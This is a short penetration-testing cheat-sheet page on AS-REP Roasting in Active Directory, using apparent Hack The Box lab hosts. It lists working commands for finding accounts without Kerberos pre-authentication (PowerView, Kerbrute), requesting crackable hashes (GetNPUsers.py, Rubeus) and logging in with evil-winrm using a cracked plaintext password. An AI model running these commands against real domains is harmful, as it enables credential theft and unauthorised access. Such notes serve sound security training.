ASREP-R Roasting

If we can identify valid usernames on the domain (using Kerbrute, for an example), we can try to determine if some users are vulnerable to AS-REP Roasting. Sometimes, PreAuthentication is not required, this is not very common, but possible. If PreAuthentication is not required, it is possible to ask for a TicketGrantTicket as the user without any pre-authentication.

AS-REP Roasting can be done from Linux or from a domain-joined Windows machine.

Enumeration

List all users with DONT_REQ_PREAUTH setting enabled.

Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl

While enumerating users, Kerbrute will automatically dump the AS-REP for all users that do not require pre-authentication.

kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt

From our Kali attack box, we can perform ASREP-R with the following command. This will set automatically the format to hashcat.

root@kali# python3 GetNPUsers.py 'EGOTISTICAL-BANK.LOCAL/' -usersfile users.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.10.175

#OR with no usersfile

root@kali# python3 GetNPUsers.py -dc-ip 10.10.10.161 -request 'htb.local/' -format hashcat

If we have GenericWrite or GenericAll enabled on a domain account, we can set the DONT_REQ_PREAUTH setting to that account and then request a TGT for that user.

If we get hashes, we can crack it using john or hashcat. See hashcat section.

Once the hash is cracked, we can try to log in using evil-winrm or psexec.py to gain a foothold on the target system.

evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23

Rubeus

Locally from the target system, we can perform ASPREP-R with the following commands:

PS C:\htb> .\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat

PreviousEnumeration NextBloodhound

Last updated 1 year ago